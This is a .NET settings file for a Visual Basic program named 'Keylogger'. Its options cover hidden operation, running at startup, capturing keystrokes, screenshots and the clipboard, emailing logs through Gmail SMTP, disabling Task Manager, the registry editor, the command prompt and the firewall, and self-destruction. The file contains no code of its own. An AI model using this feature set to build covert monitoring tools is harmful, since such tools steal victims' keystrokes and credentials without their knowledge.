<?xml version="1.0" encoding="utf-8" ?>
<configuration>
    <configSections>
        <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >
            <section name="Keylogger.My.MySettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />
        </sectionGroup>
    </configSections>
    <system.diagnostics>
        <sources>
            <!-- This section defines the logging configuration for My.Application.Log -->
            <source name="DefaultSource" switchName="DefaultSwitch">
                <listeners>
                    <add name="FileLog"/>
                    <!-- Uncomment the below section to write to the Application Event Log -->
                    <!--<add name="EventLog"/>-->
                </listeners>
            </source>
        </sources>
        <switches>
            <add name="DefaultSwitch" value="Information" />
        </switches>
        <sharedListeners>
            <add name="FileLog"
                 type="Microsoft.VisualBasic.Logging.FileLogTraceListener, Microsoft.VisualBasic, Version=8.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL"
                 initializeData="FileLogWriter"/>
            <!-- Uncomment the below section and replace APPLICATION_NAME with the name of your application to write to the Application Event Log -->
            <!--<add name="EventLog" type="System.Diagnostics.EventLogTraceListener" initializeData="APPLICATION_NAME"/> -->
        </sharedListeners>
    </system.diagnostics>
    <userSettings>
        <Keylogger.My.MySettings>
            <setting name="directory" serializeAs="String">
                <value>C:\Keylogger Log</value>
            </setting>
            <setting name="hide" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="startlog" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="password" serializeAs="String">
                <value />
            </setting>
            <setting name="email" serializeAs="String">
                <value />
            </setting>
            <setting name="gmusername" serializeAs="String">
                <value />
            </setting>
            <setting name="gmpassword" serializeAs="String">
                <value />
            </setting>
            <setting name="startup" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="ssdirectory" serializeAs="String">
                <value>C:\Keylogger Log\Screenshots</value>
            </setting>
            <setting name="showiconintray" serializeAs="String">
                <value>True</value>
            </setting>
            <setting name="encrypt" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="hideprocess" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="autocheck" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="autoemail" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="timerinterval" serializeAs="String">
                <value>1</value>
            </setting>
            <setting name="takescreenshot" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="sstimertinterval" serializeAs="String">
                <value>1</value>
            </setting>
            <setting name="sstimeramount" serializeAs="String">
                <value />
            </setting>
            <setting name="emailphotos" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="enableshutdown" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="shutdownlink" serializeAs="String">
                <value />
            </setting>
            <setting name="smtpserver" serializeAs="String">
                <value>smtp.gmail.com</value>
            </setting>
            <setting name="smtpport" serializeAs="String">
                <value>587</value>
            </setting>
            <setting name="enablessl" serializeAs="String">
                <value>True</value>
            </setting>
            <setting name="alwaysontop" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="sendemailatlaunch" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="includesysinfo" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="hideprogramfolder" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="getrunningprocesses" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="getclipboard" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="getipaddress" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="disabletaskmanager" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="disableregedit" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="disablecmd" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="disablefolderoptions" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="enableselfdestruct" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="selfdestructlink" serializeAs="String">
                <value />
            </setting>
            <setting name="disablecontrolpanel" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="disablerun" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="disablerightclick" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="disablefirewall" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="emailupdate" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="language" serializeAs="String">
                <value />
            </setting>
        </Keylogger.My.MySettings>
    </userSettings>
</configuration>
